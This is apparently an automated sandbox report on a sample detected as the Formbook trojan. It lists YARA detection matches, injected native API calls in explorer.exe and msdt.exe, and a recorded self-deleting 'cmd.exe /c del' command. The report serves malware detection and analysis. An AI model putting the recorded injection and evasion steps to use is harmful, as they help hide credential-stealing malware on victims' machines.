Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: 7pECKdsaig.exe PID: 6000, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 3452, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: msdt.exe PID: 5148, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_00A81030	0_2_00A81030
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_00A9E866	0_2_00A9E866
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_00A9E1F5	0_2_00A9E1F5
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_00A9D5AD	0_2_00A9D5AD
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_00A82D8E	0_2_00A82D8E
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_00A82D90	0_2_00A82D90
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_00A9ED31	0_2_00A9ED31
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_00A89E50	0_2_00A89E50
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_00A82FB0	0_2_00A82FB0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01734120	0_2_01734120
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0171F900	0_2_0171F900
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017D1002	0_2_017D1002
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017E28EC	0_2_017E28EC
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017420A0	0_2_017420A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017E20A8	0_2_017E20A8
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0172B090	0_2_0172B090
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017E2B28	0_2_017E2B28
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017DDBD2	0_2_017DDBD2
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0174EBB0	0_2_0174EBB0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017E22AE	0_2_017E22AE
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017E1D55	0_2_017E1D55
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01710D20	0_2_01710D20
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017E2D07	0_2_017E2D07
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0172D5E0	0_2_0172D5E0
Source: C:\Windows\explorer.exe	Code function: 1_2_0E173232	1_2_0E173232
Source: C:\Windows\explorer.exe	Code function: 1_2_0E16DB32	1_2_0E16DB32
Source: C:\Windows\explorer.exe	Code function: 1_2_0E16DB30	1_2_0E16DB30
Source: C:\Windows\explorer.exe	Code function: 1_2_0E172036	1_2_0E172036
Source: C:\Windows\explorer.exe	Code function: 1_2_0E169082	1_2_0E169082
Source: C:\Windows\explorer.exe	Code function: 1_2_0E170912	1_2_0E170912
Source: C:\Windows\explorer.exe	Code function: 1_2_0E16AD02	1_2_0E16AD02
Source: C:\Windows\explorer.exe	Code function: 1_2_0E1765CD	1_2_0E1765CD
Source: C:\Windows\explorer.exe	Code function: 1_2_100D8232	1_2_100D8232
Source: C:\Windows\explorer.exe	Code function: 1_2_100D7036	1_2_100D7036
Source: C:\Windows\explorer.exe	Code function: 1_2_100CE082	1_2_100CE082
Source: C:\Windows\explorer.exe	Code function: 1_2_100CFD02	1_2_100CFD02
Source: C:\Windows\explorer.exe	Code function: 1_2_100D5912	1_2_100D5912
Source: C:\Windows\explorer.exe	Code function: 1_2_100D2B30	1_2_100D2B30
Source: C:\Windows\explorer.exe	Code function: 1_2_100D2B32	1_2_100D2B32
Source: C:\Windows\explorer.exe	Code function: 1_2_100DB5CD	1_2_100DB5CD
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF20A0	2_2_04AF20A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B920A8	2_2_04B920A8
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04ADB090	2_2_04ADB090
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B928EC	2_2_04B928EC
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AD841F	2_2_04AD841F
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B81002	2_2_04B81002
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF2581	2_2_04AF2581
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04ADD5E0	2_2_04ADD5E0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B925DD	2_2_04B925DD
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AC0D20	2_2_04AC0D20
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AE4120	2_2_04AE4120
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04ACF900	2_2_04ACF900
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B92D07	2_2_04B92D07
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B91D55	2_2_04B91D55
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B922AE	2_2_04B922AE
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B92EF7	2_2_04B92EF7
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AE6E30	2_2_04AE6E30
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AFEBB0	2_2_04AFEBB0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B91FF1	2_2_04B91FF1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B8DBD2	2_2_04B8DBD2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B92B28	2_2_04B92B28
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_0059E866	2_2_0059E866
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_00582D90	2_2_00582D90
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_00582D8E	2_2_00582D8E
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_0059D5AD	2_2_0059D5AD
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_00589E50	2_2_00589E50
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_00582FB0	2_2_00582FB0

Source: C:\Windows\SysWOW64\msdt.exe

Code function: String function: 04ACB150 appears 35 times

Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_00A9A350 NtCreateFile,	0_2_00A9A350
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_00A9A480 NtClose,	0_2_00A9A480
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_00A9A400 NtReadFile,	0_2_00A9A400
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_00A9A530 NtAllocateVirtualMemory,	0_2_00A9A530
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_00A9A3FB NtReadFile,	0_2_00A9A3FB
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_00A9A47A NtClose,	0_2_00A9A47A
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01759910 NtAdjustPrivilegesToken,LdrInitializeThunk,	0_2_01759910
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017599A0 NtCreateSection,LdrInitializeThunk,	0_2_017599A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01759860 NtQuerySystemInformation,LdrInitializeThunk,	0_2_01759860
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01759840 NtDelayExecution,LdrInitializeThunk,	0_2_01759840
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017598F0 NtReadVirtualMemory,LdrInitializeThunk,	0_2_017598F0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01759A50 NtCreateFile,LdrInitializeThunk,	0_2_01759A50
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01759A20 NtResumeThread,LdrInitializeThunk,	0_2_01759A20
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01759A00 NtProtectVirtualMemory,LdrInitializeThunk,	0_2_01759A00
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01759540 NtReadFile,LdrInitializeThunk,	0_2_01759540
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017595D0 NtClose,LdrInitializeThunk,	0_2_017595D0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01759710 NtQueryInformationToken,LdrInitializeThunk,	0_2_01759710
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017597A0 NtUnmapViewOfSection,LdrInitializeThunk,	0_2_017597A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01759780 NtMapViewOfSection,LdrInitializeThunk,	0_2_01759780
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01759660 NtAllocateVirtualMemory,LdrInitializeThunk,	0_2_01759660
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017596E0 NtFreeVirtualMemory,LdrInitializeThunk,	0_2_017596E0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01759950 NtQueueApcThread,	0_2_01759950
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017599D0 NtCreateProcessEx,	0_2_017599D0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0175B040 NtSuspendThread,	0_2_0175B040
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01759820 NtEnumerateKey,	0_2_01759820
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017598A0 NtWriteVirtualMemory,	0_2_017598A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01759B00 NtSetValueKey,	0_2_01759B00
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0175A3B0 NtGetContextThread,	0_2_0175A3B0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01759A10 NtQuerySection,	0_2_01759A10
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01759A80 NtOpenDirectoryObject,	0_2_01759A80
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01759560 NtWriteFile,	0_2_01759560
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0175AD30 NtSetContextThread,	0_2_0175AD30
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01759520 NtWaitForSingleObject,	0_2_01759520
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017595F0 NtQueryInformationFile,	0_2_017595F0
Source: C:\Windows\explorer.exe	Code function: 1_2_100D9E12 NtProtectVirtualMemory,	1_2_100D9E12
Source: C:\Windows\explorer.exe	Code function: 1_2_100D8232 NtCreateFile,	1_2_100D8232
Source: C:\Windows\explorer.exe	Code function: 1_2_100D9E0A NtProtectVirtualMemory,	1_2_100D9E0A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B09860 NtQuerySystemInformation,LdrInitializeThunk,	2_2_04B09860
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B09840 NtDelayExecution,LdrInitializeThunk,	2_2_04B09840
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B099A0 NtCreateSection,LdrInitializeThunk,	2_2_04B099A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B095D0 NtClose,LdrInitializeThunk,	2_2_04B095D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B09910 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_04B09910
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B09540 NtReadFile,LdrInitializeThunk,	2_2_04B09540
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B096E0 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_04B096E0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B096D0 NtCreateKey,LdrInitializeThunk,	2_2_04B096D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B09660 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_04B09660
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B09650 NtQueryValueKey,LdrInitializeThunk,	2_2_04B09650
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B09A50 NtCreateFile,LdrInitializeThunk,	2_2_04B09A50
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B09780 NtMapViewOfSection,LdrInitializeThunk,	2_2_04B09780
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B09FE0 NtCreateMutant,LdrInitializeThunk,	2_2_04B09FE0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B09710 NtQueryInformationToken,LdrInitializeThunk,	2_2_04B09710
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B098A0 NtWriteVirtualMemory,	2_2_04B098A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B098F0 NtReadVirtualMemory,	2_2_04B098F0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B09820 NtEnumerateKey,	2_2_04B09820
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B0B040 NtSuspendThread,	2_2_04B0B040
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B095F0 NtQueryInformationFile,	2_2_04B095F0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B099D0 NtCreateProcessEx,	2_2_04B099D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B0AD30 NtSetContextThread,	2_2_04B0AD30
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B09520 NtWaitForSingleObject,	2_2_04B09520
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B09560 NtWriteFile,	2_2_04B09560
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B09950 NtQueueApcThread,	2_2_04B09950
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B09A80 NtOpenDirectoryObject,	2_2_04B09A80
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B09A20 NtResumeThread,	2_2_04B09A20
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B09610 NtEnumerateValueKey,	2_2_04B09610
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B09A10 NtQuerySection,	2_2_04B09A10
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B09A00 NtProtectVirtualMemory,	2_2_04B09A00
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B09670 NtQueryInformationProcess,	2_2_04B09670
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B0A3B0 NtGetContextThread,	2_2_04B0A3B0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B097A0 NtUnmapViewOfSection,	2_2_04B097A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B09730 NtQueryVirtualMemory,	2_2_04B09730
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B0A710 NtOpenProcessToken,	2_2_04B0A710
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B09B00 NtSetValueKey,	2_2_04B09B00
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B09770 NtSetInformationFile,	2_2_04B09770
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B0A770 NtOpenThread,	2_2_04B0A770
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B09760 NtOpenProcess,	2_2_04B09760
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_0059A350 NtCreateFile,	2_2_0059A350
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_0059A400 NtReadFile,	2_2_0059A400
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_0059A480 NtClose,	2_2_0059A480
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_0059A530 NtAllocateVirtualMemory,	2_2_0059A530
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_0059A3FB NtReadFile,	2_2_0059A3FB
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_0059A47A NtClose,	2_2_0059A47A

Source: 7pECKdsaig.exe

Static PE information: No import functions for PE file found

Source: 7pECKdsaig.exe, 00000000.00000002.293667137.0000000003520000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamemsdt.exej% vs 7pECKdsaig.exe
Source: 7pECKdsaig.exe, 00000000.00000002.289263472.000000000199F000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 7pECKdsaig.exe
Source: 7pECKdsaig.exe, 00000000.00000003.251882713.000000000167C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 7pECKdsaig.exe
Source: 7pECKdsaig.exe, 00000000.00000002.289263472.000000000180F000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 7pECKdsaig.exe
Source: 7pECKdsaig.exe, 00000000.00000003.287536333.00000000036A4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsdt.exej% vs 7pECKdsaig.exe

Source: 7pECKdsaig.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 7pECKdsaig.exe

Static PE information: Section .text

Source: 7pECKdsaig.exe	ReversingLabs: Detection: 76%
Source: 7pECKdsaig.exe	Virustotal: Detection: 59%

Source: 7pECKdsaig.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\7pECKdsaig.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\7pECKdsaig.exe C:\Users\user\Desktop\7pECKdsaig.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
Source: C:\Windows\SysWOW64\msdt.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\7pECKdsaig.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\7pECKdsaig.exe"	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lock

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@6/1@4/1

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3660:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: 7pECKdsaig.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: msdt.pdbGCTL source: 7pECKdsaig.exe, 00000000.00000002.293667137.0000000003520000.00000040.10000000.00040000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.281701865.000000000352D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.287536333.00000000036A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: 7pECKdsaig.exe, 00000000.00000003.251882713.000000000155D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.000000000180F000.00000040.00001000.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000002.00000003.292381298.000000000490D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000002.00000003.289235822.000000000476D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp
